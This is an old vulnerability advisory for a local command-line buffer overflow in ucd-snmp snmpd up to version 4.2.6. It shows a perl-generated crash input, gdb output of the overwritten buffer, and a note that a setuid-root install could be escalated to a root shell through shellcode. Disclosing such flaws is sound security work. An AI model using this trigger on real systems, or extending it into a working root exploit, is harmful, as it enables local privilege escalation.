---------- priestmasters UCD SNMP local buffer overflow advisorie ------------- Affected file: /usr/local/bin/snmpd Version : ucd-snmp <= 4.2.6 Error class : command line buffer overflow It's possible to overflow a buffer, if we start it with a long string as Argument after the -p switch. - ./snmpd -p `perl -e 'print "A"x6700'` - Segmentation fault In gdb: - (gdb) r -p `perl -e 'print "A"x6700'` - The program being debugged has been started already. - Start it from the beginning? (y or n) y - Starting program: /usr/local/sbin/./snmpd -p `perl -e 'print "A"x6700'` - Program received signal SIGSEGV, Segmentation fault. - 0x804a2d6 in main (argc=1094795585, argv=0x41414141) at snmpd.c:453 - 453 if (argv[arg][0] == '-') { Buf is the overflowed buffer. - (gdb) x/50x buf - 0xbfffc4bc: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc4cc: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc4dc: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc4ec: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc4fc: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc50c: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc51c: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc52c: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc53c: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc54c: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc55c: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc56c: 0x41414141 0x41414141 0x41414141 0x41414141 - 0xbfffc57c: 0x41414141 0x41414141 If snmpd is installed setuid root, it's possible to overwrite the return address and jump to another location (shellcode) and launch a setuid root shell (Local root compromise). If you have questions, mail me or visit my homepage. http://www.priestmaster.org Happy hacking, priestmaster